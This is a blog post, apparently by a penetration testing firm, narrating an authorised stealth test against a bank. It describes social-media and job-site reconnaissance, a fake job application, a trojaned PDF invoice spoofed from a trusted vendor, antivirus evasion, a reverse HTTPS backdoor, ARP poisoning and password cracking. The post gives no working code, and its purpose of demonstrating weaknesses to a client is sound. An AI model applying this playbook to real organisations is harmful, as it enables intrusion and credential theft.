Netragard Hacking Your Bank

We were recently hired to perform an interesting Advanced Stealth Penetration test for a mid-sized bank. The goal of the penetration test was to penetrate into the bank’s IT Infrastructure and see how far we could get without detection. This is a bit different than most penetration tests as we weren’t tasked with identifying risks as much as we were with demonstrating vulnerability.

The first step of any penetration test is reconnaissance. Reconnaissance is the military term for the passive collection of intelligence about an enemy prior to attacking that enemy. It is technically impossible to effectively attack an enemy without first obtaining actionable intelligence about the enemy. Failure to collect good intelligence can result in significant casualties, unnecessary collateral damage and a completely failed attack. In penetration testing, damages are realized by downed systems and a loss of revenue.

Because this engagement required stealth, we focused on the social attack vectors and Social Reconnaissance. We first targeted FaceBook with our “FaceBook from the hackers perspective” methodology. That enabled us to map relationships between employees, vendors, friends, family, etc. It also enabled us to identify key people in Accounts Receivable / Accounts Payable (“AR/AP”).

In addition to FaceBook, we focused on websites like Monster, Dice, Hot Jobs, LinkedIn, etc. We identified a few interesting IT related job openings that disclosed interesting and useful technical information about the bank. That information included but was not limited to what Intrusion Detection technologies had been deployed, what their primary Operating Systems were for Desktops and Servers, and that they were a Cisco shop.

Naturally, we thought that it was also a good idea to apply for the job to see what else we could learn. To do that, we created a fake resume that was designed to be the “perfect fit” for a “Sr. IT Security Position” (one of the opportunities available). Within one day of submission of our fake resume, we had a telephone screening call scheduled.

We started the screening call with the standard meet and greet, and an explanation of why we were interested in the opportunity. Once we felt that the conversation was flowing smoothly, we began to dig in a bit and start asking various technology questions. In doing so, we learned what Anti-Virus technologies were in use and we also learned what the policies were for controlling outbound network traffic.

That’s all that we needed…

Upon completion of our screening call, we had sufficient information to attempt stealth penetration with a high probability of success. The beauty is that we collected all of this information without sending a single packet to our customer’s network. In summary we learned:

  • That the bank uses Windows XP for most Desktops
  • Who some of the bank’s vendors were (IT Services)
  • The names and email addresses of people in AR/AP
  • What Anti-Virus technology the bank uses
  • Information about the bank’s traffic control policies

Based on the intelligence that we collected, we decided that the ideal scenario for stealth penetration would be to embed an exploit into a PDF document and to send that PDF document to the bank’s AR/AP department from the bank’s trusted IT Services provider. This attack was designed to exploit the trust that our customer had in their existing IT Services provider.

When we created the PDF, we used the new reverse HTTPS payload that was recently released by the Metasploit Project. (Previously we were using similar but more complex techniques for encapsulating our reverse connections in HTTPS.) We like reverse HTTPS connections for two reasons:

  • First, Intrusion Detection Technologies cannot monitor encrypted network traffic. Using an encrypted reverse connection ensures that we are protected from the prying eyes of Intrusion Detection Systems and less likely to trip alarms.
  • Second, most companies allow outbound HTTPS (port 443) because it’s required to view many websites. The reverse HTTPS payload that we used mimics normal web browsing behavior and so is much less likely to set off any Intrusion Detection events.

Before we sent the PDF to our customer, we checked it against the same Antivirus Technology that they were using to ensure that it was not detected as malware or a virus. To evade the scanners we had to “pack” our pseudo-malware so that it would not be detected. Once that was done and tested, we were ready to launch our attack.

When we sent the PDF to our customer, it didn’t take long for the victim in AP/AR to open it; after all, it appeared to be a trusted invoice. Once it was opened, the victim’s computer was compromised and established a reverse connection to our lab, which we then tunneled into to take control of the victim’s computer (all via HTTPS).

Once we had control, our first order of operation was to maintain access. To do this we installed our own backdoor technology onto the victim’s computer. Our technology also used outbound HTTPS connections, but for authenticated command retrieval. So if our control connection to the victim’s computer was lost, we could just tell our backdoor to re-establish the connection.

The next order of operation was to deploy our suite of tools on the compromised system and to begin scoping out the internal network. We used selective ARP poisoning as a first method for performing internal reconnaissance. That proved to be very useful as we were able to quickly identify VNC connections and capture VNC authentication packets. As it turns out, the VNC connections that we captured were being made to the Active Directory (“AD”) server.

We were able to crack the VNC password by using a VNC cracking tool. Once that happened, we were able to access the AD server and extract the server’s SAM file. We then successfully cracked all of the passwords in that file, including the historical user passwords. Once the passwords were cracked, we found that the same credentials were used across multiple systems. As such, we were not only able to access desktops and servers, but also Cisco devices, etc.

In summary, we were able to penetrate our customer’s IT Infrastructure and effectively take control of the entire infrastructure without being detected. We accomplished that by avoiding conventional methods of penetration and by using our own unorthodox yet obviously effective penetration methodologies.

This particular engagement was interesting in that our customer’s goal was not to identify all points of risk, but to identify how deeply we could penetrate. Since the engagement, we’ve worked with that customer to help them create barriers for isolation in the event of penetration. Since those barriers have been implemented, we haven’t been able to penetrate as deeply.

As usual, if you have any questions or comments, please leave them on our blog. If there’s anything you’d like us to write about, please email me the suggestion. If I’ve made a grammatical mistake in here… I’m a hacker not an English major.